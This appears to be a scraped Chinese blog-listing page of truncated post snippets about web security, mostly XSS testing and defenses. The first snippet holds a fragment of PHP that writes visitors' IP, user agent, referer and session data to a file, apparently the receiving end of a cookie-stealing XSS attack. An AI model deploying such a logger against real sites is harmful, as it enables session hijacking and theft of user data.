".$time." = ".$ip."User Agent: ".$agent."Referer: ".$referer."Session: ".$data."";$file=fopen('vb.php','a');fwrite($file,$text);fclose($file);header("...
分类:
其他好文 时间:
2015-02-11 10:33:56
阅读次数:
135
从本章开始学习xss如何查找xss:拿到一个网站之后,随便找一个页面测试下http://xss.com/product/product_searchProducts.action?productName=111查看页面源代码为:添加一些变形,随便写(这里主要是看页面时如何构造语句的):把111变为:...
分类:
其他好文 时间:
2015-02-10 22:53:45
阅读次数:
152
一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种漏洞情况和防止攻击的办法.一.跨站脚本攻击(XSS) 跨站脚本攻击(XSS,Cross-site scripting)是最常见和基本的攻击WEB网站的方法。攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时,特....
分类:
Web程序 时间:
2015-02-10 10:53:27
阅读次数:
243
PHP清理跨站XSS xss_clean 函数 整理自codeigniter Security由Security Class 改编成函数xss_clean 单文件直接调用。BY吠品。//来自codeigniter 清理跨站XSS xss_clean//Security Class 改编成函数func...
分类:
Web程序 时间:
2015-02-09 12:43:40
阅读次数:
169
我们常说的网络安全其实应该包括以下三方面的安全:1、机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马。2、完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子,当然这是传说,常见的方式是XSS跨站脚本攻击和csrf跨站请求伪造。3、可用性,比如我们的网络服务是否...
分类:
其他好文 时间:
2015-02-06 12:48:46
阅读次数:
226
Web安全实战演练(附件)Web安全实战演练(1)-环境搭建Web安全实战演练(2)-密码字典破解测试Web安全实战演练(3)-SQL注入测试Web安全实战演练(4)-XSS测试下载地址:Web安全实战演练http://files.cnblogs.com/files/-U2-/Web%E5%AE%8...
分类:
Web程序 时间:
2015-02-05 17:40:43
阅读次数:
175
(最常用) (?用tab键弄出来的空格)(/**/ 表示注释)html 实体 unicode [/post]
分类:
其他好文 时间:
2015-02-04 18:12:33
阅读次数:
103
网站的信息安全越来越重要,结合自己1年多的互联网金融方面的安全防护做些总结。后续希望研究并运用:1、加密算法2、DDOS的防护技巧3、跨站点请求伪造4、XSS攻击5、文件上传漏洞6、信息垃圾过滤网站已持续运作1年半有余,从最初的零星访问到1天近w的pv量,还有各种的ddos攻击,让原本不太富裕的主机...
分类:
其他好文 时间:
2015-02-03 21:20:24
阅读次数:
189
Writer:BYSocket(泥沙砖瓦浆木匠) 微博:BYSocket 豆瓣:BYSocket Reprint it anywhere u want. 文章Points: ? 1. 认识XSS ? 2. XSS攻击 ? 3. XSS防御(重点) ?? 一、认识XSS先 ? 先说个故事吧,在上一篇...
分类:
Web程序 时间:
2015-01-31 23:24:22
阅读次数:
491
